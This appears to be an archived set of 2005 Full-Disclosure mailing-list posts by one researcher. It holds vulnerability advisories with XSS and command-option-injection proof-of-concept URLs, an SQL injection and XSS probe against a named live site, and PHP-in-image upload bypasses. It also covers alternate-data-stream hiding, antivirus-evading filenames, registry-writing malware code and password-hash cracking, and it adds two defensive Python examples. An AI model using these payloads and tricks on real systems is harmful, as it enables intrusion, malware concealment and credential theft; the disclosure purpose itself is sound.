pretty damn skilled, but these others  Zone-H, Vigilante and the likes
I would avoid. blind leading the blind if you ask me.

I dont know about the others,
but i do know Zone-h Hands on Hacking 2 day seminars are worth it,
have actual hands on hacking labs, and are quite informative.
( and dont claim to be blackhat style training, nor a CEH prep class)
While not targeted for the security professional, they are an excellent way
for lower level admins, developers, corporate IT, and others that are not
security savvy to learn about real-world attacks and mitigation.

mw


Re: [Full-disclosure] another filename bypass vulnerability - fromcmd.exe

2005-11-17 Thread Morning Wood
I think the OP was getting at this being an AV bypass vector for worms and
other malware that can interact with cmd.exe .
Theory being that AV will scan by extension ( malware.exe vs malware.ext )
and thus evade detection but yet be executable.
In light, informal testing this appears to be a realistic scenario that
provides yet another vector for AV bypass. On test systems,
c:\malware.exe.txt runs the malware.exe, and does not open notepad. (
cmd.exe parses the file header, explorer.exe uses .extension )
my2bits,
MW


Re: [Full-disclosure] FAO Mark Murtagh from Websense

2005-11-13 Thread Morning Wood
And your blatant attempt to turn Morning Wood against me in public was
just pathetic.

funny... as I replied first. I suggest you back up, sit down, and stfu.

kthnx,
mw




Re: [Full-disclosure] FAO Mark Murtagh from Websense

2005-11-12 Thread Morning Wood
Heres what Mark Murtagh had to say
http://www.biosmagazine.co.uk/op.php?id=314\ Maybe another ten minutes
of your life wasted ;-)

Content Query has failed - SELECT
opinion.body,opinion.author,opinion.auth_title,opinion.auth_comp,
opinion.ptime,opinion.headline,opinion.category,opinion.active,opinion.forum
, prod_type.name as prod_type, prod_type.id as prod_type_id FROM opinion,
prod_type WHERE opinion.id = 314\\ AND opinion.active = 1 AND opinion.ptime
 1131846681 AND opinion.category = prod_type.id

sweet!


Re: [Full-disclosure] FAO Mark Murtagh from Websense

2005-11-12 Thread Morning Wood
First you missed the comment where I fixed my typo on the thread,
second, I thought someone of your hacking experience, you would have
been able to translate that message by yourself. In any case, I made

umm, no I doubt I missed anything except your contentless dribble.
but I did notice the error of the web application... not only is it
vulnerable to SQL injection, it is also vuln to XSS. Possibly
you would like to enroll in a Zone-H Hands on Hacking Seminar
so you too might be able to understand them too, instead of filling this
list with your paranoid, megalomaniac rants.

http://www.biosmagazine.co.uk/op.php?id=314;okbromgbrbn3td3v/b%20roxbr%20br

http://www.nccgroup.com/events/index.aspx


On 11/13/05, Morning Wood [EMAIL PROTECTED] wrote:
 Content Query has failed - SELECT
 opinion.body,opinion.author,opinion.auth_title,opinion.auth_comp,

opinion.ptime,opinion.headline,opinion.category,opinion.active,opinion.forum
 , prod_type.name as prod_type, prod_type.id as prod_type_id FROM opinion,
 prod_type WHERE opinion.id = 314\\ AND opinion.active = 1 AND
opinion.ptime
  1131846681 AND opinion.category = prod_type.id

 sweet!



Re: [Full-disclosure] Question about ethics when discovering a securityfault in system

2005-10-27 Thread Morning Wood

Work with the company, coordinate an advisory release when they have the
update avail.
Chances are you will receive some form of a credit, thanking you for finding
the flaw, and bringing it to the mfg's attention.

cheers


Re: [Full-disclosure] Re: phpBB 2.0.17 (and other BB systems as well).

2005-10-25 Thread Morning Wood
By prepending image headers you can often fool php/IE.
This technique has been used successfully to bypass php checking
and renders the php upon access.
---
ÿØÿà JFIF
?php
some phpcode
?
---
or
---
GIF87aÔ
?php
some phpcode
?
---


Re: [Full-disclosure] Call to participate: GNessUs security scanner

2005-10-11 Thread Morning Wood
xscan from http://xfocus.org uses nessus plugins and the nasl library.
I have used this tool for years, and the addition of nasl/nessus in 3.x
is wonderful. If you havent checked out this great tool, do so now.
http://xfocus.org/programs/200507/18.html

cheers,
MW


[Full-disclosure] Tellme 1.2

2005-10-05 Thread Morning Wood

- EXPL-A-2005-015 exploitlabs.com Advisory 044 -

  - TellMe -





AFFECTED PRODUCTS
=
TellMe v1.2 and earlier
http://kimihia.org.nz/projects/
http://kimihia.org.nz/projects/tellme/



OVERVIEW

Tellme - get all the lowdown details on an address
Tellme is used to discern what a computer is running,
 and also to help track down servers.
It combines together into one place traceroute tools,
 head requests, server examination, and whois lookups.

TellMe is used widely in default Plesk installs as a bundled
3rd party add on.



DETAILS
===
1. XSS

TellMe does not properly filter malicious script content.
XSS may be inserted in the IP or HOST parameter.
The malicious script is then rendered and executed in the
 context of the user's browser.



2. command option access

Tellme allows access to command line options of the whois function via:
  render_Open("WHOIS");
  if ( $q_Host )
    passthru(EscapeShellCmd("whois " . $q_This));



3. information disclosure

TellMe discloses path information in error output, echoing
 back the full path to the script.




POC
===
1.
--
 by script inclusion in the q_host parameter
http://[host]/tellme/index.php?q_Host=iframe
src=http://whatismyip.com/iframe


2.
--
 by prepending --* options to the host entry
http://[host]/net/index.php?q_IP=q_Host=--version+test.como_WhoIs=on
http://[host]/net/index.php?q_IP=q_Host=--help+test.como_WhoIs=on


3.
-
 by prepending -- to the Server and HEAD options
http://[host]/net/index.php?q_IP=q_Host=--+test.como_Server=ono_Head=on

Warning:  fsockopen(): unable to connect to --help test.com:80
 in /home/httpd/vhosts/[VHOSTUSER]/httpdocs/net/index.php on line 246





SOLUTION:
=
vendor contact:
Sept 29, 2005
[EMAIL PROTECTED] ( returned )
http://kimihia.org.nz/about/feedback/

Vendor response:
Oct 4, 2005

The author has released an updated version and a diff patch, available at:

Here is the new version:
http://kimihia.org.nz/projects/tellme/files/tellme-1.3_php3.txt

Here is a diff:
http://kimihia.org.nz/projects/tellme/files/tellme-1.2-1.3.diff

Here is the new README:
http://kimihia.org.nz/projects/tellme/files/tellme.txt





Credits
===
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs


mail:   wood at exploitlabs.com
mail:   morning_wood at zone-h.org
-- 
web: http://exploitlabs.com
web: http://zone-h.org

orig: http://exploitlabs.com/files/advisories/EXPL-A-2005-015-tellme.txt
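Item 2 of the advisory works because shell-metacharacter escaping leaves a leading `--option` intact, so the host value still reaches `whois` as an option. The model and the hardened argument builder below are an added example, not TellMe's code or the vendor's 1.3 fix; the function names are hypothetical, `escape_shell_cmd_like` only approximates PHP's `EscapeShellCmd`, and the `--` separator assumes a getopt-style `whois` client.

```python
import ipaddress
import re
import shlex

# Approximation of the characters PHP's escapeshellcmd() backslash-escapes.
SHELL_META = re.compile(r"([&#;`|*?~<>^()\[\]{}$\\\n\xff'\"])")
# One DNS label: letters, digits, hyphen; no leading or trailing hyphen.
HOST_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def escape_shell_cmd_like(command):
    """Backslash-escape shell metacharacters, leaving spaces and '-' alone."""
    return SHELL_META.sub(r"\\\1", command)


def argv_as_built_by_tellme(q_host):
    """Model of passthru(EscapeShellCmd("whois " . $q_This)): escape the
    string, then let the shell split it into words."""
    return shlex.split(escape_shell_cmd_like("whois " + q_host))


def validate_target(q_host):
    """Return a canonical IP literal or DNS name, or raise ValueError.
    Anything with spaces or a leading '-' is rejected outright."""
    candidate = q_host.strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        pass
    name = candidate.rstrip(".")
    if not name or len(name) > 253:
        raise ValueError("empty or over-long host name")
    for label in name.split("."):
        if not HOST_LABEL.fullmatch(label):
            raise ValueError("not a valid host name: %r" % q_host)
    return name


def safe_whois_argv(q_host):
    """Argument vector for subprocess.run(argv, shell=False). The value is
    validated first; '--' then ends option parsing as defence in depth."""
    return ["whois", "--", validate_target(q_host)]


if __name__ == "__main__":
    # Inputs taken from the advisory's item 2, plus one ordinary host.
    for value in ("test.com", "--version test.com", "--help test.com"):
        print("input:    %r" % value)
        print("  1.2 model argv:", argv_as_built_by_tellme(value))
        try:
            print("  hardened argv: ", safe_whois_argv(value))
        except ValueError as error:
            print("  hardened:       rejected (%s)" % error)
```

The same validated value should be used for the Server and HEAD lookups, which removes the error path in item 3 that echoes the script location.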


Re: [Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 3

2005-10-03 Thread Morning Wood
Can you give me an example of a trojan, worm, or another program which has
added the last USB device installed in the Windows Registry,
yes, see below

or how about a program, worm, trojan -

some ASM code... ( edited )
  any_key1 db "SYSTEM\CurrentControlSet\AnyKeyIWant", 0
  another_key2 db "SYSTEM\CurrentControlSet\AnotherKeyIWant", 0
  invoke RegCreateKeyEx, HKEY_LOCAL_MACHINE, addr any_key1, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, addr hRegkey, NULL
  invoke wsprintf, addr senddata, addr some_value3, addr port
  invoke wsprintf, addr recvdata, addr another_value2, addr port
  invoke RegSetValueEx, hRegkey, addr senddata, 0, REG_SZ, addr recvdata, eax
  invoke RegCloseKey, hRegkey
( repeat for another_key2 )

easily done in .c too

or
c:\regedt32 -s somebad.reg
( will silently install ANY key you want )


which caused something to be added to the last typed URL?
VNC ( or aformentioned key writes )

how do you think malware writes startup keys? I am confused by your
statement...
once a system has been compromised, ANYTHING can be written to the registry
( especially if the attacker has SYSTEM privs )



my2bits,
M.W




Re: [Full-disclosure] CORE-Impact license bypass

2005-09-26 Thread Morning Wood
been known since at least v3.2
are you using a 3.x or a 4.x series?
i believe the 4.x requires an auth from core before use

- Original Message - 
From: c0ntex [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Monday, September 26, 2005 3:30 AM
Subject: [Full-disclosure] CORE-Impact license bypass


I seem to have stumbled over a bug in Core Impact
licensing mechanisms that will allow anyone to continually use the
Core Impact product even after the license has expired.

This is not a security issue but it is, I feel, either an oversight or
a feature which can be abused to utilise the Core Impact product for
longer than designed / desired.

In my business funded Core Impact install on this machine, the
license expired at the end of last month and the usual Your license
has expired pop-up appears, however it is easy to re-enable Core to a
working install by merely changing the system date on the PC to say a
month before the product was due to expire. Oops  ;) I guess Core is
using a very simplistic license mechanism.

Emailed CORE two times, 1 week ago, no reply.
--

regards
c0ntex


Re: [Full-disclosure] RE: perldiver

2005-09-22 Thread Morning Wood
the proposed fix is the vendor's suggestion, not mine. Feel free to contact
http://scriptsolutions.com/ and tell him yourself kthnx.




- Original Message - 
From: [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Wednesday, September 21, 2005 11:58 AM
Subject: [Full-disclosure] RE: perldiver


 I believe mrwood's proposed fix isn't going to help.  As it just
 strips the first character if it's \w or :

 perhaps when he suggested $module =~ s/^([A-Za-z0-9]|:)//g; he meant
 $module =~ s/[^A-Za-z0-9:]//g;

 Thank you morning_wood for helping promote secure web application
 development.  Keep up the good work.





[Full-disclosure] perldiver

2005-09-20 Thread Morning Wood

  - EXPL-A-2005-014 exploitlabs.com Advisory 043 -

  -perldiver -






AFFECTED PRODUCTS
=
Perldiver v1.x and 2.x
http://scriptsolutions.com/



OVERVIEW

Perl Diver digs into your server's perl installation
 and giving you the information you need and quick
 and easy to find manner.



DETAILS
===
1. XSS

Perldiver does not properly filter malicious script content.
XSS may be inserted in the module parameter ( v2.x )
or as a GET request in the main script ( v1.x ).

The malicious script is then rendered and executed
 in the context of the user's browser.



POC
===

1.x
--
http://[host]/[path]/perldiver.pl?testhereSCRIPTalert(document.domain);/SCRIPT


2.x
--
http://[host]/[path]/perldiver.cgi?action=2020module=scriptdocument.write(document.domain)/script

bonus vendor site vuln:
http://www.scriptsolutions.com/programs/free/perldiver/perldiver.cgi?action=2020module=scriptdocument.write(document.domain)/script



SOLUTION:
=
vendor contact:
Sept 14, 2005
http://www.scriptsolutions.com/support/postlist.pl?Cat=Board=DDBugs
response Sept 15, 2005


If you are a current PerlDiver user, you can either download the updated
version,
or insert the following line after my $module = param( 'module' );
in the module_detail subroutine:

   $module =~ s/^([A-Za-z0-9]|:)//g;

updated version:
http://www.scriptsolutions.com/support/showflat.pl?Board=DLPerlDiverNumber=446
http://www.scriptsolutions.com/support/files/4-446-perldiver.zip



Credits
===
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs


mail:   wood at exploitlabs.com
mail:   morning_wood at zone-h.org
-- 
web: http://exploitlabs.com
web: http://zone-h.org

orig advisory:
http://exploitlabs.com/files/advisories/EXPL-A-2005-014-perldiver.txt
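The substitution given under SOLUTION and the alternative proposed in the list reply earlier on this page behave very differently, which is easiest to see by running both on the same inputs. The Python port below is an added example, not Perl Diver's code; the function names, the sample inputs and the module-name grammar used by the third variant are assumptions made for illustration.

```python
import html
import re

# Assumed grammar for a Perl module name: identifiers joined by "::".
MODULE_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_]*(?:::[A-Za-z0-9_]+)*")

# Constructed inputs: two ordinary module names and one value carrying markup.
SAMPLES = ["File::Find", "My_Local::Module", "<b>File::Find</b>"]


def vendor_fix(module):
    """Port of the advisory's line: $module =~ s/^([A-Za-z0-9]|:)//g;
    The ^ anchor means at most one leading allowed character is removed."""
    return re.sub(r"^([A-Za-z0-9]|:)", "", module)


def reply_fix(module):
    """Port of the line from the list reply: $module =~ s/[^A-Za-z0-9:]//g;
    Every character outside the allow-list is removed."""
    return re.sub(r"[^A-Za-z0-9:]", "", module)


def render_module_heading(module):
    """Third variant (assumption, not from the thread): reject anything that
    is not a module name, and HTML-encode the value where it is written."""
    if not MODULE_NAME.fullmatch(module):
        return "<h2>Invalid module name</h2>"
    return "<h2>" + html.escape(module) + "</h2>"


def compare(samples=SAMPLES):
    """Return (input, vendor_fix, reply_fix, validated heading) per sample."""
    return [(s, vendor_fix(s), reply_fix(s), render_module_heading(s))
            for s in samples]


if __name__ == "__main__":
    for original, vendor, reply, heading in compare():
        print("input      :", original)
        print("  vendor   :", vendor)    # markup survives, valid names lose a char
        print("  reply    :", reply)     # markup characters gone, '_' also gone
        print("  validated:", heading)
```

Stripping characters changes what the user asked for, as the underscore case shows; validating and then encoding at output keeps legitimate names intact.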


[Full-disclosure] mimicboard2

2005-09-08 Thread Morning Wood

  - EXPL-A-2005-013 exploitlabs.com Advisory 042 -

- mimicboard2 -






AFFECTED PRODUCTS

mimicboard2 #086  and lower
http://www.chitta.com/nobu/download/#mimic2




OVERVIEW

Mimic2 is an html open forum type of blog, tailored in
particular to the Japanese market ( and is very popular )




DETAILS

1. XSS
Mimic2 does not properly filter malicious script content.
XSS may be inserted in the name, title and comment sections,
and is persistent in nature.
The malicious script is then rendered upon visitation and
is executed in the context of the user's browser.

2. information disclosure
http://[host]/mimic2.dat is viewable via the webroot and has
no protection by default. mimic2 stores data in this file
consisting of:
a. administrator passwords
b. user information including refer ip address, message content
   and password if one was used in the post.




POC

1.
input malicious iframe script into the
comment, title and name  sections.
http://[host]/mimic2.cgi
eg:iframe src=[attacker url]/iframe


2.
the password(s) are easily crackable as evidenced by: 

mimic2.dat

echo mimic board2:Fdtr67zbisXVA:13 mimic2.txt

john -w:password.lst mimic2.txt
Loaded 1 password (Standard DES [24/32 4K])
password (mimic board2)




SOLUTION:

vendor contact:
[EMAIL PROTECTED] Aug 24, 2005
no response as of Sept 8, 2005



Credits

This vulnerability was discovered and researched by 
Donnie Werner of exploitlabs

mail:   wood at exploitlabs.com
mail:   morning_wood at zone-h.org

web: http://exploitlabs.com
web: http://zone-h.org


Re: [Full-disclosure] Shell32.dll.124.config

2005-09-05 Thread Morning Wood
sounds like an ADS ( alternate data stream )
http://www.sysinternals.com/Utilities/Streams.html

I wrote this awhile back as notes on a project...

this is a simple example...
Create an executable ADS:
-
c:\type c:\fullpath\exename.exe  somefile.ext:exename.exe
( or somefile.exe:someothername.exe )

Execute an ADS:
---
c:\start c:\pathto\somefile.ext
( starts the example above running exename.exe
behind the visible somefile.ext )
c:\type c:\start.bat  c:\windows\explorer.exe:start.bat
( this creates a file named start.bat that executes
explorer.exe )
c:\start ( will now execute the full path to c:\to\somefile.ext )

hope this helps.


- Original Message - 
From: y0himba [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Monday, September 05, 2005 4:33 PM
Subject: [Full-disclosure] Shell32.dll.124.config


 Hi,
 Yes I am a noob.  I have a question though.  Google searches and a
 few other things can tell me nothing about shell32.dll.124.config.  I am
 on WindowsXP SP2, and keep seeing this file show up in antivirus scans,
but
 cannot find it anywhere on the system!  I think it is dynamically created
by
 something, but after sitting and watching Filemon 7.02 for 20 minutes or
so,
 I give up.  Has anyone heard of this file?  Antivir, Bitdefender, AVG and
 Clam all show it on the system, have scanned it, but have found nothing.
I
 have never seen this file before...

 Thanks in advance for your help!


